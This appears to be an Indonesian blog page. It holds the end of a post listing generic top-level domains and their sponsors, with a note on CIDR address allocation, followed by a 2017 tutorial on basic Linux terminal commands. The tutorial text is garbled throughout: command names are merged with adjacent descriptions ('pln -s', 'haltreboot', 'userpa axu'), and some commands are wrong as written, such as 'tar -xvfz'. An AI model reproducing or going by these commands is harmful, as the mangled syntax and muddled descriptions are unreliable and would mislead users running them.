1.                 .aero - industri penerbangan, atas permintaan Societe Internationale de Telecommunications Aeronautiques SC (SITA)

2.                 .biz - bisnis, atas permintaan JVTeam, LLC (di koordinasi oleh NeuLevel)

3.                 .coop- koperasi, atas permintaan National Cooperative Business Association (NCBA)

4.                 .info - penggunaan umum, atas permintaan Afilias, LLC (di koordinasi olehAfilias)

5.                 .museum - museums, ataspermintaan Museum Domain Management Association (MDMA)

6.                 .name - individual, atas permintaan Global Name Registry, LTD7.                 .pro -profesional,

atas permintaan RegistryPro, LTD Informasi lebih lanjut tentang berbagai TLD, proses registrasinya, maupun tambahan TLD yang ada dapat di lihat di Web ICANN New TLD Program.Dan bagaimana dengan IP address? sebelum digunakannya CIDR, sebuah organisasi biasanya memperoleh IP address (biasanya kelas C) dan domain name pada saat yang sama. Biasanya, pemegang domain name adalah pemilik IP address, jika mereka pindah ISP maka tabel routing seluruh Internet di ubah / di update.Pada hari ini, ISP memperoleh address dalam block CIDR. Pelanggan, jika mereka sudah mempunyai domain name atau akan mengambil sebuah domainname, akan memperoleh alokasi IP address dari block CIDR ISP. Jika pelanggan berpindah ISP, mereka harus mengembalikan IP addresstersebut.

Kamis, 20 Juli 2017

Perintah dasar Terminal linux




ls
Melihat isi file dari direktori aktif. Pada linux perintah "dir" hanya berupa alias dari perintah "ls". Untuk perintah "ls" sendiri sering di buatkan alias "ls --color",agar pada waktu di "ls" di tampilkan warna-warna sesuai dengan file-filenya, biasanya hijau untuk execute, dsb.

ls -al
Melihat seluruh isi file pada direktori aktif beserta file hidden + attribute/permissionfilenya , lalu di tampilkan layar perlayar.

cd (directory)
Change directory. Menggunakan "cd" tanpa nama direktori akan menghantarkan anda ke home direktor. Dan "cd -" akan menghantarkan anda ke direktori sebelumnya.

cp source destination
mengcopy suatu file. contohnya : cp /home/sleepholic/Desktop/Joomla.zip /opt/lampp/htdocs/ .Ini berarti saya mengcopyfile Joomla.zip yang ada di desktop ke folder htdocs di lamppm copy source destination Mengcopy suatu file dari/ke dos filesystem. Contoh mcopy a:autoexec.bat/junk .Gunakan "man mtools" untuk command yang sejenis: mdir, mcd, mren, move, mdel, mmd, mrd, mformat....

mv source destination
Memindahkan atau mengganti nama file. Contohnya : mv /opt/lampp/htdocs/joomla.zip /home/sleepholic/Desktop . ini aritnya anda memindahkan (cut) file joomla.zip ke Desktop .Untuk Rename : mv namaLama namaBaru . Contoh: mv Joomla.zip Project.zip .ini berartianda mengganti nama joomla.zip menjadi project.zi

pln -s source destination
Membuat Simbolic Links, contoh ln -sf /usr/X11R6/bin/XF86_SVGA /etc/X11/X, membuat Simbolic link dari file XF86_SVGA ke Xrm filesMenghapus file. Contoh rm /opt/lampp/htdocs/Joomla.zip ini berarti anda menghapus file Joomla.zip dalam folder /opt/lampp/htdocs/mkdir directoryMembuat direktori baru. contoh mkdir /home/sleepholic/Desktop/folderbaru .Ini berarti anda telah membuat folder baru di desktop dengan nama folder baru

rmdir directory
Menghapus direktori yang telah kosong. Hanya bisa di lakukan untuk folder yang kosong. Contoh : rmdir /home/sleepholic/Desktop/folderbaru .Ini berarti anda menghapus folder baru di Desktoprm

-r files Recursive Remove
Menghapus file, direktori dan subdirektorinya. Tidak perduli apakah direktori/folder tersebut ada isnya atau tidak. apapun isinya akan terhapus. Hati-hati menggunakan perintah ini apabila anda login sebagai root, karena root dengan mudah dapat menghapus seluruh file pada sistem dengan perintah di atas, tidak ada perintah untuk undelete di Linux (belum)

more
Untuk menampilkan sesuatu layar per layar. tambahkan perintah more dibelakang.Contoh : cp --help |more.Maka help dari cp akan di tampilkan layar-per-layarless

filename
Melihat suatu file layar per layar, dan tekan tombol "q" apabila ingin keluar.

pico -w
filenameEdit suatu text file, dengan menonaktifkan fungsi word wrap, sangat berguna untuk mengedit file seperti /etc/fstab.

lynx file.html
Melihat file html atau browse ke net dengan text mode, dimana gambar/image tidak dapat ditampil-kan, tapi lynx adalah suatu browser yang sangat cepat, sangat berguna bila anda hanya menginginkan suatu artikel tanpa image. Contoh : lynx google.com .anda akan menikmati google di terminal.

tar -xvfz filename.tar.gz
Meng-untar sebuah file tar sekaligus meng-uncompress file tersebut (*.tar.gz or *.tgz), untuk meletakkannya direktori yg di inginkan tambahkan option -C direktori, contoh tar -

zxvf filename.tar.gz
-C /opt (meletakkan file tersebut di direktori /opttar -

xvf filename.tar
Meng-untar sebuah file tar yang tidak terkompress (*.tar).

gunzip filename.gz
Meng-uncompress sebuah file zip (*.gz" or *.z). dengan menggunakan gzip (juga zip atau compress) jika anda menginginkan mengompress file.bunzip2 filename.

bz2
Meng-uncompress file dengan format (*.bz2) dengan utiliti "bzip2", digunakan pada file yang besar.

unzip filename.zip
Meng-uncompress file dengan format (*.zip) dengan utiliti "unzip" yang kompatibel dengan pkzip for DOS.

find / -name
“filename”Mencari "namafile" pada komputer anda dimulai dengan direktori /. Namafile tersebut mungkin saja berisi wildcard (*,?).

locate filename
Mencari file dengan string "filename". Sangat mudah dan cepat dari perintah di atas.talk username1

Berbicara dengan keyboard dengan user lain yg sedang login pada mesin kita (atau gunakan "talk username1@machinename" untuk berbicara dengan komputer lain) . Untuk menerima undangan percakapan, ketikkan"talk username2". Jika sese orang mencoba untuk berbicara dengan anda dan itu dirasakan mengganggu, anda bisa menggunakan perinta"mesg n" untuk menolak pesan tersebut. Dan gunakan perintah "who" atau "rwho" untuk melihat siapa user yang mengganggu tersebut.

mc
Menjalankan "Morton Commander" ... eh... salah maksudnya "Midnight Commander" sebagai file manager, cepat dan bagus.(kalau gak ada install dulu.)

telnet server
Untuk menghubungkan komputer kita ke komputer lain dengan menggunakan protokol TELNET. Gunakan nama mesin atau Nomor IP mesin, dan anda akan mendapatkan prompt login name dari mesin tersebut, masukkan passwordnya, oh ya .. anda juga harus punya account dimesin remote tersebut. Telnet akan menghubungkan anda dengan komputer lain dan membiarkan anda untuk mengoperasikanmesin tersebut. Telnet sangat tidak aman, setiap yang anda ketik menjadi "open text", juga dengan password anda! Gunakan ssh alih-alih telnet untuk mengakses mesin secara remoter login server (=remote login)Menghubungkan anda ke komputer lain. Login name dan password, tetapi apabila account anda tersebut telah di pakai, maka anda akan mendapatkan pesan kesalahan pada password anda. Sangat tidak aman juga, gunakan ssh sebagai gantinya.

 rsh server (=remote shell)
Jalan lain untuk menghubungkan anda ke remote machine. Apabila login name/password anda sedang di pakai di remote mesin tsb, maka password anda tidak akan berlaku. Idem dengan rlogin, gantikan dengan ssh. ftp server Ftp ke mesin lain, ini sangat berguna untuk mengopy file ke/dari remote mesin. Juga tidak aman, gunakan scp dari keluarga ssh sebagai gantinya

minicom
Program Minicom (dapat dikatakan seperti "Procomm/Hyperterminal for Linux")..

/program_name
Menjalankan program pada direktori aktif, yang mana tidak terdapat pada PATH andaxinit Menjalankan X-window server (tanpa windows manager)..

startx
Menjalankan X-window server dan meload default windows manager. Sama seperti perintah "win" under DOS dengan Win3.1

startx — :1
Menjalankan sesi X-windows berikutnya pada display 1 (default menggunakan display 0).Anda dapat menjalankan banyak GUI terminal secara bersamaan, untuk pindah antar GUI gunakan , , etc, tapi ini akan lebih banyak memakan memori.x-term(pada X terminal) ,menjalankan X-windows terminal. Untuk keluar ketikkan "exit"


xboing
(pada X terminal). Sangat lucu deh ...., seperti games-games lama .....

gimp
Program image editor yang sangat bagus,bisa di samakan dengan Adobe Photoshop, yang membedakan adalah program ini gratis.

shutdown -h now
(sebagai root) Shut down sistem. Umumnya digunakan untuk remote shutdown. Gunakan untuk shutdown pada konsol (dapat dijalankan oleh user).

haltreboot
(sebagai root) Halt atau reboot mesin. Lebih simple dari perintah di atas.

man topic
Menampilkan daftar dari sistem manual pages (help) sesuai dengan topic. Coba"man man". lalutekan "q" untuk keluar dari viewer. Perintah "info topic" Manual pages dapat dibaca dilhat dengan cara"any_command --help".

apropos topic
Menampilkan bantuan manual berdasarkan topik.

pwd
Melihat direktori kerja saat ini (print working directory)

hostname
Menampilkan nama local host (mesin dimana anda sedang bekerja). Gunakan perintah " netconf"(sebagai root) untuk merubah nama host dari mesin tersebut, atau edit file /etc/hosts

whoami
Mencetak login name anda. untuk mengetahui anda terlogin dengan user apaid

username
Mencetak user id (uid) atau group id (gid)

date
Mencetak atau merubah tanggal dan waktu pada komputer, contoh merubah tanggal dan waktu ke 2000-12-31 23:57 dengan perintah; date 123123572000

time
Melihat jumlah waktu yg di tangani untuk penyelesaian suatu proses + info lainnya.Jangan dibingungkan dengan perintah"date"

who
Melihat user yang login pada komputer kita.

rwho -a
Melihat semua user yg login pada network anda. Layanan perintah rwho ini harus diaktifkan, jalankan setup sebagai root utk mengaktifkannya.

finger username
Melihat informasi user, coba jalankan; finger

root last
Melihat user sebelumnya yang telah logindi komputer.

uptime
Melihat jumlah waktu pemakaian komputer oleh seseorang, terhitung proses reboot terakhir.

ps (=print status)
Melihat proses-proses yang di jalankan oleh

userpa axu
Melihat seluruh proses yang dijalankan,walaupun tanpa terminal control, juga ditampilkan nama dari user untuk setiap proses.

top
Melihat proses yang berjalan, dengan urutan penggunaan cpu.

uname -a
Informasi system kernel andafree Informasi memory (dalam kilobytes).

df -h
(=disk free) Melihat informasi pemakaian disk pada seluruh system (in human-readable form)

du / -bh
(=disk usage) Melihat secara detil pemakaian disk untuk setiap direktori, dimulai dari root (in human legible form).

cat /proc/cpuinfoCpu info.
Melihat file pada /proc directori yang bukan merupakan file nyata (not realfiles).

cat /proc/interrupts
Melihat alamat interrupt yang dipakai.

cat /proc/version
Versi dari Linux dan informasi lainnya.

cat /proc/filesystems
Melihat filesystem yang di gunakan.

cat /etc/printcap
Melihat printer yang telah di setup

lsmod
(as root) Melihat module-module kernel yang telah di load.

set
Melihat environment dari user yang aktif echo $

PATH
Melihat isi dari variabel "PATH". Perintah ini dapat di gunakan untuk menampilkan variabel environmen lain dengan baik. Gunakan "set" untuk melihat environmen secara penuh.

dmesg
Mencetak pesan-pesan pada waktu proses boot.(menampilkan file: /var/log/dmesg).

adduser
Menambah pengguna.

clear
Membersihkan Layar *beberapa perintah mengharuskan anda login sebagai root. caranya tinggal menambahakan “sudo” di depan perintahmisalkan : sudo rmdir /home/sleepholic/Desktop/x atau sudo cp /opt/lampp/lampp /home/sleepholic/

Daftar Blog Saya